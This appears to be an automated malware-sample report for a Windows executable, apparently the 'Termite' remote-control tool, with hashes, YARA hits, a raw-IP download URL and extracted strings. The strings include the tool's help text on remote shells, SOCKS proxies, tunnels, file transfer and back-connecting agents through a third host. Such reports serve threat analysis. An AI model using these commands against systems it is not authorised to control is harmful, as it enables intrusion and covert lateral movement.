Sample details: 937ab62ec68d58596b6ad02dd139ba1a --

Hashes
MD5: 937ab62ec68d58596b6ad02dd139ba1a
SHA1: 41e2f853f250c8aca127ca111079f6a7dc06d278
SHA256: d83862b5bbe3aa774e949d77d67c9c7b83dbd3b01c7fb9199353c79f28662b6d
SSDEEP: 1536:4eSUW73S+w/1BKKaAxtyzF7QeVH/BdOXKh:4e+bq/1wKaAxtyp7DVP4Kh
Details
File Type: PE32
Yara Hits
YRP/IsPE32 | YRP/IsConsole | YRP/IsBeyondImageSize | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Misc_Suspicious_Strings |
Source
http://173.199.71.172/admin_Win32.exe
Strings
		!This program cannot be run in DOS mode.
P`.data
.rdata
0@.eh_fram
0@.bss
.idata
127.0.0.1
libgcc_s_dw2-1.dll
__register_frame_info
libgcj-13.dll
_Jv_RegisterClasses
__deregister_frame_info
[ ERROR    ]  
WSAStartup failed!
cmd.exe
bind wrong.
Socket Server Starting now !
server start error pvalue is NULL
Got A Shell Session Here >>
start a new cmd shell here
GoodBye ! Shell Session Closed Now .
remember free this tree
node_id = %d ,child_num = %d,k = %d
res = 0? child_num = %d, k = %d
Zero tree
MacOSX
Windows
Arm-Linux
Unknow-OS
SOCKSv4 Not Support now!
the recv ip is %s
Something error on read URL
the read url is %s 
Not support IPv6?
NOT IPv4 IPv6 and URL ?
 Tcp ---> %s:%d 
Not support  UDP?
[ WARNNING ]  
--> %3d <-- (close)used/unused  %d/%d
Please wait a moment... I will try my best to release more resources.
--> %3d <-- (open)used/unused  %d/%d
[ OK       ]  
New Agent(%d) Online. Its father(%d)..
[ ERROR    ]  
CloseJob Error 1111
Unsupport now %d
UNKNOWN proto->cmdType %d
[ ERROR    ]  
add error ????
NodeType is error
Send info Error
[ OK       ]  
[recv ]id = %d,ostype = %d , nodetype = %d, pcname = %s
info == NULL or myself == NULL
UNKNOWN client node type %d
[ ERROR    ]  
list is null or List-> joblist is NULL
describe :%s , %d
[ ERROR    ]  
conn is NULL
proto is NULL
PROTOBUFLEN_OVERFLOW !!!!!
PROTO_RecvProto recv len error
[ ERROR    ]  
NEW TUNNEL to %d Build Error
nextconn == M_GETTARGETCONN_ERROR targetid = %d
M_BUILDDIRECTTUNNEL_ERROR targetid = %d
M_BUILDREVERSETUNNEL_ERROR targetid = %d
UNKNOWN nextconn -> ConnType
[ ERROR    ]  
GLOBAL_SetJobList NULL joblist
GLOBAL_GetJobList NULL joblist
No Name Now
[ OK       ]  
MY ID IS %d, Upper ID is %d
{id:%d,OSType:%d,pcname:%s,linktype:%d}
***************1 Neighbor node list ************
*************** Tree node map      ************
my id is %d now.
[ ERROR    ]  
nrecv (%d) != maxlen (%d)
m_fun_server_cbf no CBF fun????
[ ERROR    ]  
pvalue is NULL
conn is NULL
BuildTargetSock Error
[ ERROR    ]  
RECV MSG ERROR
[ OK       ]  
New_Message_Here -->%s
[ ERROR    ]  
Open %s File Error
[ OK       ]  
UPFile CMD exec Ok !
Open %s File error
[ ERROR    ]  
Recv CMDMsg Error
CCProxy_onNewTunnel Error CMD(%d)
c:p:hvadq
tohost
toport
version
detailed
This node is Admin
[ ERROR    ]  
 arg is unknown
[ OK       ]  
c is %c
sendmsg
send msg here
sendmsg %s
 >>>>>>>>>>>>> Current ID is %d <<<<<<<<<<<<< 
goto %d
Current be contral ID is %d
listen
target agent listen new port here
listen %d
connect
target agent connect new agent
connect %s%ds %s
remote ip   :%s
remote port :%d
Start socks server from target agent
socks %d
Start Socks from %d port,Server Agent is %d
lcxtran
lcxtran %s %s%ds %s
locolport   :%d
shell %d
band %d's shell on %d locol port.
upfile
upfile %s %s
From ->(%s),To -> (%s)
downfile
downfile %s %s
unknow cmd
**************************************************************************
                          BASE COMMAND
 ------------------------------------------------------------------------     
This help text.
0. help
 %-35s %s
Display agent map.
1. show
==========================================================================
                          AGENT CONTROL
Select id as target agent.
2. goto     [id]
Start server port on target agent.
3. listen   [port]
Connect new agent from target agent.
4. connect  [ip] [port]
 START A SERVER ON TARGET AGENT,THEN BIND IT WITH LOCAL PORT
Start a socks server.
5. socks    [lport]
Build a tunnel with remote host.
6. lcxtran  [lport] [rhost] [rport]
Start a shell server.
7. shell    [lport]
Upload file from local host.
8. upfile   [from_file] [to_file]
Download file from target agent.
9. downfile [from_file] [to_file]
Beta 1.0
VERSION : %s
	$ ./xxx -h
	$ ./xxx -c [rhost] -p [rport]
---------
options :
Remote host address.
%4s %-8s %s
The port on remote host.
This help page.
Show the version.
Show the about text.
Show the detailed text.
          ."'".
      .-./ _=_ \.-.
     {  (,(oYo),) }}
     {{ |   "   |} }
     { { \(---)/  }}
     {{  }'-=-'{ } }
     { { }._:_.{  }}
     {{  } -:- { } }
     {_{ }'==='{  _}
    ((((\)     (/))))
Termite
 %s is a Machine Control Tool.It has many advantages.
 There is a level-1 tool before ,you can find it from 
 http://www.rootkiter.com/EarthWorm/ .
 On the basis of 'EarthWorm',I added a built-in shell,
 then add so much commands there. You can find more 
 discription by add '-h' and '-d' parameter.
 Contributors
 rootkiter : The creator
 wooyaa    : Proviede some advice
 syc4mor3  : Named for this tool
 1. You can control multiple hosts at the same time
   In "admin_exe" there is a built-in shell.
   So that,you can do different operation at the same time.
 2. It support Multiple control command.
    1. Lcx_Tran       2. SOCKSv5 Server
    3. Shell-Server   4. Upload file 
    5. Download file  
 3. You can manage Common e-machine.
   It support various OS or CPU.For example:
        Linux  (x86/x64/Arm/Mipsel);
        Windows(x86/x64);
        MacOS  (x64);
       More is coming...
 4. You can use it on the Intranet or Extranet.
   Eg:
   4-1: When target has public IP,manage it with direct mode.
      a-step) Run agent on target host:
        $ ./agent_exe -l 8888
      b-step) Manage it with connect it
        $ ./admin_exe -c [target-ip] -p 8888 .
   4-2. When target in a remote Extranet.You can Manage it
        through a third-HOST(With public IP).
      a-step) Run agent on third-HOST:
      b-step) back-connect third-HOST from target with agent
        $ ./agent_exe -c [third-HOST ip] -p 8888
      c-step) Manage target through third-HOST
        $ ./admin_exe -c [third-HOST ip] -p 8888
 5. You can manage remote hosts through a multi-level cascade.
   In the build-in shell,there is a "connect" or "listen" 
   command,you can use it recv another agent,then manage the  
   new agent together.
Beta 1.0
VERSION : %s
Mingw runtime failure:
  VirtualQuery failed for %d bytes at address %p
  Unknown pseudo relocation protocol version %d.
  Unknown pseudo relocation bit size %d.
%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
POSIXLY_CORRECT
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
CreateProcessA
CreateThread
DeleteCriticalSection
EnterCriticalSection
ExitProcess
GetLastError
GetModuleHandleA
GetProcAddress
InitializeCriticalSection
LeaveCriticalSection
SetUnhandledExceptionFilter
TlsGetValue
VirtualProtect
VirtualQuery
__getmainargs
__p__environ
__p__fmode
__set_app_type
_cexit
_onexit
_setmode
atexit
calloc
fclose
fflush
fprintf
fwrite
getenv
malloc
memcpy
memset
printf
putchar
signal
sprintf
sscanf
strcpy
strlen
strncpy
vfprintf
WSASocketA
WSAGetLastError
WSAStartup
__WSAFDIsSet
accept
connect
gethostbyname
inet_ntoa
listen
select
shutdown
KERNEL32.dll
msvcrt.dll
WS2_32.dll
WSOCK32.DLL